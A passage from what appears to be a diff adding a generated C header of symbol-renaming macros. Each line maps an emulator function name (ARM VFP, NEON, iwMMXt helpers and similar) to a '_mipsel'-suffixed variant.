gen_helper_vfp_cmps gen_helper_vfp_cmps_mipsel +#define gen_helper_vfp_divd gen_helper_vfp_divd_mipsel +#define gen_helper_vfp_divs gen_helper_vfp_divs_mipsel +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_mipsel +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_mipsel +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_mipsel +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_mipsel +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_mipsel +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_mipsel +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mipsel +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_mipsel +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_mipsel +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_mipsel +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_mipsel +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_mipsel +#define gen_helper_vfp_mins gen_helper_vfp_mins_mipsel +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_mipsel +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_mipsel +#define gen_helper_vfp_muld gen_helper_vfp_muld_mipsel +#define gen_helper_vfp_muls gen_helper_vfp_muls_mipsel +#define gen_helper_vfp_negd gen_helper_vfp_negd_mipsel +#define gen_helper_vfp_negs gen_helper_vfp_negs_mipsel +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mipsel +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_mipsel +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_mipsel +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_mipsel +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_mipsel +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_mipsel +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_mipsel +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_mipsel +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_mipsel +#define gen_helper_vfp_subd gen_helper_vfp_subd_mipsel +#define gen_helper_vfp_subs gen_helper_vfp_subs_mipsel +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_mipsel +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_mipsel +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_mipsel +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_mipsel +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_mipsel +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_mipsel +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_mipsel +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_mipsel +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_mipsel +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_mipsel +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_mipsel +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_mipsel +#define gen_helper_vfp_touid gen_helper_vfp_touid_mipsel +#define gen_helper_vfp_touis gen_helper_vfp_touis_mipsel +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_mipsel +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_mipsel +#define gen_helper_vfp_tould gen_helper_vfp_tould_mipsel +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_mipsel +#define gen_helper_vfp_touls gen_helper_vfp_touls_mipsel +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_mipsel +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_mipsel +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_mipsel +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_mipsel +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_mipsel +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_mipsel +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_mipsel +#define gen_helper_wfe gen_helper_wfe_mipsel +#define gen_helper_wfi gen_helper_wfi_mipsel +#define gen_hvc gen_hvc_mipsel +#define gen_intermediate_code_internal gen_intermediate_code_internal_mipsel +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_mipsel +#define gen_iwmmxt_address gen_iwmmxt_address_mipsel +#define gen_iwmmxt_shift gen_iwmmxt_shift_mipsel +#define gen_jmp gen_jmp_mipsel +#define gen_load_and_replicate gen_load_and_replicate_mipsel +#define gen_load_exclusive gen_load_exclusive_mipsel +#define gen_logic_CC gen_logic_CC_mipsel +#define gen_logicq_cc gen_logicq_cc_mipsel +#define gen_lookup_tb gen_lookup_tb_mipsel +#define gen_mov_F0_vreg gen_mov_F0_vreg_mipsel +#define gen_mov_F1_vreg gen_mov_F1_vreg_mipsel +#define gen_mov_vreg_F0 gen_mov_vreg_F0_mipsel +#define gen_muls_i64_i32 gen_muls_i64_i32_mipsel +#define gen_mulu_i64_i32 gen_mulu_i64_i32_mipsel +#define gen_mulxy gen_mulxy_mipsel +#define gen_neon_add gen_neon_add_mipsel +#define gen_neon_addl gen_neon_addl_mipsel +#define gen_neon_addl_saturate gen_neon_addl_saturate_mipsel +#define gen_neon_bsl gen_neon_bsl_mipsel +#define gen_neon_dup_high16 gen_neon_dup_high16_mipsel +#define gen_neon_dup_low16 gen_neon_dup_low16_mipsel +#define gen_neon_dup_u8 gen_neon_dup_u8_mipsel +#define gen_neon_mull gen_neon_mull_mipsel +#define gen_neon_narrow gen_neon_narrow_mipsel +#define gen_neon_narrow_op gen_neon_narrow_op_mipsel +#define gen_neon_narrow_sats gen_neon_narrow_sats_mipsel +#define gen_neon_narrow_satu gen_neon_narrow_satu_mipsel +#define gen_neon_negl gen_neon_negl_mipsel +#define gen_neon_rsb gen_neon_rsb_mipsel +#define gen_neon_shift_narrow gen_neon_shift_narrow_mipsel +#define gen_neon_subl gen_neon_subl_mipsel +#define gen_neon_trn_u16 gen_neon_trn_u16_mipsel +#define gen_neon_trn_u8 gen_neon_trn_u8_mipsel +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_mipsel +#define gen_neon_unzip gen_neon_unzip_mipsel +#define gen_neon_widen gen_neon_widen_mipsel +#define gen_neon_zip gen_neon_zip_mipsel +#define gen_new_label gen_new_label_mipsel +#define gen_nop_hint gen_nop_hint_mipsel +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_mipsel +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_mipsel +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_mipsel +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_mipsel +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_mipsel +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_mipsel +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_mipsel +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_mipsel +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_mipsel +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_mipsel +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_mipsel +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_mipsel +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_mipsel +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_mipsel +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_mipsel +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_mipsel +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_mipsel +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_mipsel +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_mipsel +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_mipsel +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_mipsel +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_mipsel +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_mipsel +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_mipsel +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_mipsel +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_mipsel +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_mipsel +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_mipsel +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_mipsel +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_mipsel +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_mipsel +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_mipsel +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_mipsel +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_mipsel +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_mipsel +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_mipsel +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_mipsel +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_mipsel +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_mipsel +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_mipsel +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_mipsel +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_mipsel +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_mipsel +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_mipsel +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_mipsel +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_mipsel +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_mipsel +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_mipsel +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_mipsel +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_mipsel +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_mipsel +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_mipsel +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_mipsel +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_mipsel +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_mipsel +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_mipsel +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_mipsel +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_mipsel +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_mipsel +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_mipsel +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_mipsel +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_mipsel +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_mipsel +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_mipsel +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_mipsel +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_mipsel +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_mipsel +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_mipsel +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_mipsel +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_mipsel +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_mipsel +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_mipsel +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_mipsel +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_mipsel +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_mipsel +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_mipsel +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_mipsel +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_mipsel +#define gen_rev16 gen_rev16_mipsel +#define gen_revsh gen_revsh_mipsel +#define gen_rfe gen_rfe_mipsel +#define gen_sar gen_sar_mipsel +#define gen_sbc_CC gen_sbc_CC_mipsel +#define gen_sbfx gen_sbfx_mipsel +#define gen_set_CF_bit31 gen_set_CF_bit31_mipsel +#define gen_set_condexec gen_set_condexec_mipsel +#define gen_set_cpsr gen_set_cpsr_mipsel +#define gen_set_label gen_set_label_mipsel +#define gen_set_pc_im gen_set_pc_im_mipsel +#define gen_set_psr gen_set_psr_mipsel +#define gen_set_psr_im gen_set_psr_im_mipsel +#define gen_shl gen_shl_mipsel +#define gen_shr gen_shr_mipsel +#define gen_smc gen_smc_mipsel +#define gen_smul_dual gen_smul_dual_mipsel +#define gen_srs gen_srs_mipsel +#define gen_ss_advance gen_ss_advance_mipsel +#define gen_step_complete_exception gen_step_complete_exception_mipsel +#define gen_store_exclusive gen_store_exclusive_mipsel +#define gen_storeq_reg gen_storeq_reg_mipsel +#define gen_sub_carry gen_sub_carry_mipsel +#define gen_sub_CC gen_sub_CC_mipsel +#define gen_subq_msw gen_subq_msw_mipsel +#define gen_swap_half gen_swap_half_mipsel +#define gen_thumb2_data_op gen_thumb2_data_op_mipsel +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_mipsel +#define gen_ubfx gen_ubfx_mipsel +#define gen_vfp_abs gen_vfp_abs_mipsel +#define gen_vfp_add gen_vfp_add_mipsel +#define gen_vfp_cmp gen_vfp_cmp_mipsel +#define gen_vfp_cmpe gen_vfp_cmpe_mipsel +#define gen_vfp_div gen_vfp_div_mipsel +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_mipsel +#define gen_vfp_F1_mul gen_vfp_F1_mul_mipsel +#define gen_vfp_F1_neg gen_vfp_F1_neg_mipsel +#define gen_vfp_ld gen_vfp_ld_mipsel +#define gen_vfp_mrs gen_vfp_mrs_mipsel +#define gen_vfp_msr gen_vfp_msr_mipsel +#define gen_vfp_mul gen_vfp_mul_mipsel +#define gen_vfp_neg gen_vfp_neg_mipsel +#define gen_vfp_shto gen_vfp_shto_mipsel +#define gen_vfp_sito gen_vfp_sito_mipsel +#define gen_vfp_slto gen_vfp_slto_mipsel +#define gen_vfp_sqrt gen_vfp_sqrt_mipsel +#define gen_vfp_st gen_vfp_st_mipsel +#define gen_vfp_sub gen_vfp_sub_mipsel +#define gen_vfp_tosh gen_vfp_tosh_mipsel +#define gen_vfp_tosi gen_vfp_tosi_mipsel +#define gen_vfp_tosiz gen_vfp_tosiz_mipsel +#define gen_vfp_tosl gen_vfp_tosl_mipsel +#define gen_vfp_touh gen_vfp_touh_mipsel +#define gen_vfp_toui gen_vfp_toui_mipsel +#define gen_vfp_touiz gen_vfp_touiz_mipsel +#define gen_vfp_toul gen_vfp_toul_mipsel +#define gen_vfp_uhto gen_vfp_uhto_mipsel +#define gen_vfp_uito gen_vfp_uito_mipsel +#define gen_vfp_ulto gen_vfp_ulto_mipsel +#define get_arm_cp_reginfo get_arm_cp_reginfo_mipsel +#define get_clock get_clock_mipsel +#define get_clock_realtime get_clock_realtime_mipsel +#define get_constraint_priority get_constraint_priority_mipsel +#define get_float_exception_flags get_float_exception_flags_mipsel +#define get_float_rounding_mode get_float_rounding_mode_mipsel +#define get_fpstatus_ptr get_fpstatus_ptr_mipsel +#define get_level1_table_address get_level1_table_address_mipsel +#define get_mem_index get_mem_index_mipsel +#define get_next_param_value get_next_param_value_mipsel +#define get_opt_name get_opt_name_mipsel +#define get_opt_value get_opt_value_mipsel +#define get_page_addr_code get_page_addr_code_mipsel +#define get_param_value get_param_value_mipsel +#define get_phys_addr get_phys_addr_mipsel +#define get_phys_addr_lpae get_phys_addr_lpae_mipsel +#define get_phys_addr_mpu get_phys_addr_mpu_mipsel +#define get_phys_addr_v5 get_phys_addr_v5_mipsel +#define get_phys_addr_v6 get_phys_addr_v6_mipsel +#define get_system_memory get_system_memory_mipsel +#define get_ticks_per_sec get_ticks_per_sec_mipsel +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_mipsel +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__mipsel +#define gt_cntfrq_access gt_cntfrq_access_mipsel +#define gt_cnt_read gt_cnt_read_mipsel +#define gt_cnt_reset gt_cnt_reset_mipsel +#define gt_counter_access gt_counter_access_mipsel +#define gt_ctl_write gt_ctl_write_mipsel +#define gt_cval_write gt_cval_write_mipsel +#define gt_get_countervalue gt_get_countervalue_mipsel +#define gt_pct_access gt_pct_access_mipsel +#define gt_ptimer_access gt_ptimer_access_mipsel +#define gt_recalc_timer gt_recalc_timer_mipsel +#define gt_timer_access gt_timer_access_mipsel +#define gt_tval_read gt_tval_read_mipsel +#define gt_tval_write gt_tval_write_mipsel +#define gt_vct_access gt_vct_access_mipsel +#define gt_vtimer_access gt_vtimer_access_mipsel +#define guest_phys_blocks_free guest_phys_blocks_free_mipsel +#define guest_phys_blocks_init guest_phys_blocks_init_mipsel +#define handle_vcvt handle_vcvt_mipsel +#define handle_vminmaxnm handle_vminmaxnm_mipsel +#define handle_vrint handle_vrint_mipsel +#define handle_vsel handle_vsel_mipsel +#define has_help_option has_help_option_mipsel +#define have_bmi1 have_bmi1_mipsel +#define have_bmi2 have_bmi2_mipsel +#define hcr_write hcr_write_mipsel +#define helper_access_check_cp_reg helper_access_check_cp_reg_mipsel +#define helper_add_saturate helper_add_saturate_mipsel +#define helper_add_setq helper_add_setq_mipsel +#define helper_add_usaturate helper_add_usaturate_mipsel +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_mipsel +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_mipsel +#define helper_be_ldq_mmu helper_be_ldq_mmu_mipsel +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_mipsel +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_mipsel +#define helper_be_ldul_mmu helper_be_ldul_mmu_mipsel +#define helper_be_lduw_mmu helper_be_lduw_mmu_mipsel +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_mipsel +#define helper_be_stl_mmu helper_be_stl_mmu_mipsel +#define helper_be_stq_mmu helper_be_stq_mmu_mipsel +#define helper_be_stw_mmu helper_be_stw_mmu_mipsel +#define helper_clear_pstate_ss helper_clear_pstate_ss_mipsel +#define helper_clz_arm helper_clz_arm_mipsel +#define helper_cpsr_read helper_cpsr_read_mipsel +#define helper_cpsr_write helper_cpsr_write_mipsel +#define helper_crc32_arm helper_crc32_arm_mipsel +#define helper_crc32c helper_crc32c_mipsel +#define helper_crypto_aese helper_crypto_aese_mipsel +#define helper_crypto_aesmc helper_crypto_aesmc_mipsel +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_mipsel +#define helper_crypto_sha1h helper_crypto_sha1h_mipsel +#define helper_crypto_sha1su1 helper_crypto_sha1su1_mipsel +#define helper_crypto_sha256h helper_crypto_sha256h_mipsel +#define helper_crypto_sha256h2 helper_crypto_sha256h2_mipsel +#define helper_crypto_sha256su0 helper_crypto_sha256su0_mipsel +#define helper_crypto_sha256su1 helper_crypto_sha256su1_mipsel +#define helper_dc_zva helper_dc_zva_mipsel +#define helper_double_saturate helper_double_saturate_mipsel +#define helper_exception_internal helper_exception_internal_mipsel +#define helper_exception_return helper_exception_return_mipsel +#define helper_exception_with_syndrome helper_exception_with_syndrome_mipsel +#define helper_get_cp_reg helper_get_cp_reg_mipsel +#define helper_get_cp_reg64 helper_get_cp_reg64_mipsel +#define helper_get_r13_banked helper_get_r13_banked_mipsel +#define helper_get_user_reg helper_get_user_reg_mipsel +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_mipsel +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_mipsel +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_mipsel +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_mipsel +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_mipsel +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_mipsel +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_mipsel +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_mipsel +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_mipsel +#define helper_iwmmxt_addub helper_iwmmxt_addub_mipsel +#define helper_iwmmxt_addul helper_iwmmxt_addul_mipsel +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_mipsel +#define helper_iwmmxt_align helper_iwmmxt_align_mipsel +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_mipsel +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_mipsel +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_mipsel +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_mipsel +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_mipsel +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_mipsel +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_mipsel +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_mipsel +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_mipsel +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_mipsel +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_mipsel +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_mipsel +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_mipsel +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_mipsel +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_mipsel +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_mipsel +#define helper_iwmmxt_insr helper_iwmmxt_insr_mipsel +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_mipsel +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_mipsel +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_mipsel +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_mipsel +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_mipsel +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_mipsel +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_mipsel +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_mipsel +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_mipsel +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_mipsel +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_mipsel +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_mipsel +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_mipsel +#define helper_iwmmxt_minub helper_iwmmxt_minub_mipsel +#define helper_iwmmxt_minul helper_iwmmxt_minul_mipsel +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_mipsel +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_mipsel +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_mipsel +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_mipsel +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_mipsel +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_mipsel +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_mipsel +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_mipsel +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_mipsel +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_mipsel +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_mipsel +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_mipsel +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_mipsel +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_mipsel +#define helper_iwmmxt_packul helper_iwmmxt_packul_mipsel +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_mipsel +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_mipsel +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_mipsel +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_mipsel +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_mipsel +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_mipsel +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_mipsel +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_mipsel +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_mipsel +#define helper_iwmmxt_slll helper_iwmmxt_slll_mipsel +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_mipsel +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_mipsel +#define helper_iwmmxt_sral helper_iwmmxt_sral_mipsel +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_mipsel +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_mipsel +#define helper_iwmmxt_srll helper_iwmmxt_srll_mipsel +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_mipsel +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_mipsel +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_mipsel +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_mipsel +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_mipsel +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_mipsel +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_mipsel +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_mipsel +#define helper_iwmmxt_subub helper_iwmmxt_subub_mipsel +#define helper_iwmmxt_subul helper_iwmmxt_subul_mipsel +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_mipsel +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_mipsel +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_mipsel +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_mipsel +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_mipsel +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_mipsel +#define 